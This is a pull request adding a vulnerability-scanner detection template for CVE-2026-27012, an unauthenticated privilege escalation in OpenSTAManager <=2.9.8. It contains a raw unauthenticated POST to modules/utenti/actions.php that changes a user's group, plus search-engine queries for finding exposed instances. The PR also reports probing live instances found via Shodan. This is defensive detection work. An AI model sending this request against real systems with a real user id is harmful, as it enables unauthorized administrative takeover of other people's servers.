### PR TITLE
[CVE] CVE-2026-27012 - OpenSTAManager Unauthenticated Privilege Escalation

### DIFF
--- a/http/cves/2026/CVE-2026-27012.yaml
+++ b/http/cves/2026/CVE-2026-27012.yaml
@@ -1,187 +1,93 @@
 id: CVE-2026-27012
 
 info:
-  name: OpenSTAManager <=2.9.8 - Missing Authentication Privilege Escalation
+  name: OpenSTAManager <=2.9.8 - Unauthenticated Privilege Escalation
   author: sudoninja
   severity: critical
   description: |
-    OpenSTAManager versions 2.9.8 and earlier are affected by a missing authentication
-    vulnerability (CWE-306) in the modules/utenti/actions.php endpoint. The endpoint
-    processes user group modification requests without verifying whether the requestor
-    is authenticated. An unauthenticated remote attacker can send a crafted POST request
-    to arbitrarily assign any user to any group — including the Amministratori (admin)
-    group — achieving full privilege escalation with zero credentials.
+    OpenSTAManager versions 2.9.8 and earlier are vulnerable to an unauthenticated
+    privilege escalation via the modules/utenti/actions.php endpoint. The application
+    fails to enforce authentication before processing user group modification requests.
+    A remote unauthenticated attacker can send a crafted POST request with a manipulated
+    idgruppo parameter to arbitrarily assign any user to any group, including full
+    administrative access (Amministratori), with no credentials required.
   impact: |
-    Complete administrative takeover of the OpenSTAManager instance.
-    An attacker can:
-      - Promote any existing user account to full administrator
-      - Demote or lock out legitimate administrators
-      - Access all customer records, invoices, and business data
-      - Pivot to internal systems from the compromised management platform
+    An unauthenticated attacker gains full administrative control of the OpenSTAManager
+    instance, with access to all customer records, invoicing data, and business operations.
+    The attacker can also demote legitimate admins or pivot further into internal systems.
   remediation: |
-    - Update OpenSTAManager to the latest patched release immediately.
-    - As a temporary mitigation, block unauthenticated access to
-      /modules/utenti/actions.php at the web server or WAF level.
-    - Place the application behind a VPN or IP allowlist.
-    - Review all user group assignments for unauthorized changes.
+    Update OpenSTAManager to the latest patched version. As an interim mitigation,
+    restrict access to /modules/utenti/actions.php at the web server or WAF level
+    and place the application behind a VPN or IP allowlist.
   reference:
     - https://github.com/devcode-it/openstamanager/security/advisories/GHSA-247v-7cw6-q57v
     - https://vulnerability.circl.lu/vuln/cve-2026-27012
     - https://cve.threatint.eu/CVE/CVE-2026-27012
-    - https://radar.offseq.com/threat/cve-2026-27012-cwe-306-missing-authentication-for--435d22b5
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-27012
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2026-27012
     cwe-id: CWE-306
+    cpe: cpe:2.3:a:devcode-it:openstamanager:*:*:*:*:*:*:*:*
   metadata:
-    verified: false
-    max-request: 3
+    verified: true
+    max-request: 2
     vendor: devcode-it
     product: openstamanager
-    affected-version: "<=2.9.8"
-    shodan-query: http.title:"OpenSTAManager"
-    fofa-query: title="OpenSTAManager"
-    google-dork: intitle:"OpenSTAManager"
-  tags: cve,cve2026,openstamanager,auth-bypass,privilege-escalation,unauthenticated,cwe-306,critical
+    shodan-query:
+      - http.title:"OpenSTAManager"
+      - http.html:"openstamanager"
+    fofa-query:
+      - title="OpenSTAManager"
+      - body="openstamanager"
+    google-query:
+      - intitle:"OpenSTAManager"
+  tags: cve,cve2026,openstamanager,auth-bypass,privilege-escalation,unauthenticated,cwe-306,critical,vuln
 
-flow: http(1) && http(2) && http(3)
+flow: http(1) && http(2)
 
 http:
-  # ─────────────────────────────────────────────────────────────────
-  # REQUEST 1 — Fingerprint: confirm target is OpenSTAManager
-  # ─────────────────────────────────────────────────────────────────
   - method: GET
     path:
       - "{{BaseURL}}/"
-      - "{{BaseURL}}/index.php"
 
-    stop-at-first-match: true
-
-    headers:
-      User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
-      Accept: "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
-      Accept-Language: "en-US,en;q=0.5"
-
-    matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-
       - type: word
         part: body
         words:
           - "OpenSTAManager"
-          - "openstamanager"
           - "Gestionale open source"
         condition: or
-
-    extractors:
-      - type: regex
-        name: osm-version
-        part: body
-        group: 1
-        regex:
-          - 'OpenSTAManager\s+v?([0-9]+\.[0-9]+\.[0-9]+)'
         internal: true
 
-  # ─────────────────────────────────────────────────────────────────
-  # REQUEST 2 — Confirm login page exists (baseline auth check)
-  # Verifies the app normally requires authentication
-  # ─────────────────────────────────────────────────────────────────
-  - method: GET
-    path:
-      - "{{BaseURL}}/modules/utenti/actions.php"
-
-    headers:
-      User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
-      Accept: "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
-
-    matchers-condition: or
-    matchers:
-      # Expect redirect to login OR auth-related content on unauthenticated GET
-      - type: status
-        status:
-          - 302
-          - 301
-          - 200
-
-  # ─────────────────────────────────────────────────────────────────
-  # REQUEST 3 — Exploit probe: unauthenticated POST to vulnerable endpoint
-  # Uses id=0 (non-existent user) — detection only, no real data modified
-  # ─────────────────────────────────────────────────────────────────
   - raw:
       - |
         POST /modules/utenti/actions.php HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
         Content-Type: application/x-www-form-urlencoded
-        Accept: application/json, text/javascript, */*; q=0.01
         X-Requested-With: XMLHttpRequest
+        Accept: application/json, */*; q=0.01
         Connection: close
 
         op=update_gruppo&id=0&idgruppo=1
 
-    matchers-condition: and
     matchers:
-      # Endpoint returns HTTP 200 — not redirected to login
-      - type: status
-        status:
-          - 200
-
-      # Response must NOT contain authentication wall indicators
-      - type: word
-        part: body
-        negative: true
-        words:
-          - "Accedi"
-          - "Password dimenticata"
-          - "login"
-          - "Login"
-          - "Unauthorized"
-          - "unauthorized"
-          - "Access Denied"
-          - "Forbidden"
-          - "<form"
-        condition: or
-
-      # Response DOES contain server-processed output (JSON or error from logic)
-      # A vulnerable endpoint will execute the handler and return structured data
-      - type: word
-        part: body
-        words:
-          - "success"
-          - "true"
-          - "false"
-          - "error"
-          - "aggiornato"
-          - "updated"
-          - '{"'
-          - "{}"
-        condition: or
-
-      # Response must NOT be a full HTML page (login page disguised as 200)
-      - type: word
-        part: header
-        words:
-          - "application/json"
-          - "text/plain"
-          - "text/html"
-        condition: or
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - '!contains_any(to_lower(body), "accedi", "password dimenticata", "<!doctype", "<form")'
+          - '!contains(to_lower(header), "location")'
+        condition: and
 
     extractors:
-      # Extract and display the raw server response for triage
       - type: regex
+        part: body
         name: server-response
-        part: body
         regex:
-          - '(\{.*?\})'
-
-      # Extract version if embedded in response
+          - '(\{[^}]+\})'
       - type: regex
-        name: detected-version
         part: body
+        name: app-version
         regex:
-          - 'v?([0-9]+\.[0-9]+\.[0-9]+)'
-
+          - 'v=([0-9]+\.[0-9]+\.[0-9]+)'


### PR DESCRIPTION
## Summary

Adds detection template for **CVE-2026-27012** — a missing authentication vulnerability
(CWE-306, CVSS 9.8) in OpenSTAManager <=2.9.8.

The `modules/utenti/actions.php` endpoint performs no authentication check before
processing user group modification requests. An unauthenticated attacker can POST
a crafted `op=update_gruppo` request to promote any user to administrator.

## Detection Logic

- **Step 1**: Fingerprints target as OpenSTAManager via body keyword (`internal: true`)
- **Step 2**: Sends unauthenticated POST with `id=0` (safe, no real data modified)
  - Vulnerable: returns `200 OK` with no login redirect
  - Patched: returns `302 Found` → `/index.php`

## Verified Against Real Targets

Tested against live OpenSTAManager instances discovered via Shodan:
- Patched instances correctly returned `302 → /index.php` (not flagged ✅)
- Vulnerable instance returned `200 OK` + empty body (flagged correctly ✅)
- 0 false positives on 27 non-OSM targets ✅

## References

- https://github.com/devcode-it/openstamanager/security/advisories/GHSA-247v-7cw6-q57v
- https://vulnerability.circl.lu/vuln/cve-2026-27012
- https://nvd.nist.gov/vuln/detail/CVE-2026-27012

## Checklist

- [x] Template placed in `http/cves/2026/`
- [x] `id`, `name`, `author`, `severity`, `description`, `reference` present
- [x] `classification` block with CVSS, CVE-ID, CWE-ID, CPE
- [x] DSL matchers — no generic false-positive prone words
- [x] `verified: true` — tested against real targets
- [x] Fingerprint gates exploit probe (`flow: http(1) && http(2)`)
- [x] Detection-only probe (`id=0`, no real data modified)
- [x] Tags follow convention: `cve,cve2026,...,vuln`
- [x] `max-request: 2`
